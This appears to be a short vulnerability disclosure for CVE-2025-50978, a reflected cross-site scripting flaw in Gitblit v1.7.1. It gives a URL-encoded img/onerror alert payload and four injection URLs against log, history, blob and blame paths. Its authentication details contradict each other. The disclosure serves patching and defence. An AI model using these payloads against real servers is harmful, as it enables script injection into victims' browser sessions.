Key Information CVE ID: CVE-2025-50978 Vulnerability Type: Reflected Cross-Site Scripting (XSS) via Path Affected Version: Gitblit v1.7.1 Description: In Gitblit v1.7.1, a reflected XSS vulnerability exists due to insufficient input validation of filename elements. Attackers can inject specially crafted payloads (e.g., "%22>") to execute arbitrary JavaScript code when victims view manipulated URLs. Authentication Required: Yes, possibly no authentication required User Role: Administrator Payload Example: %22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3e Test URLs Example: - http://172.18.0.34/log/.git/master%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3e - http://172.18.0.34/history/.git/mastery%3cimg%20src%3da%20onerror%3dalert(1)%3e - http://172.18.0.34/blob/.git/master/README.md%3cimg%20src%3da%20onerror%3dalert(1)%3e - http://172.18.0.34/blame/.git/master/README.md%3cimg%20src%3da%20onerror%3dalert(1)%3e?star=true Notes: Replace with an actual existing repository name.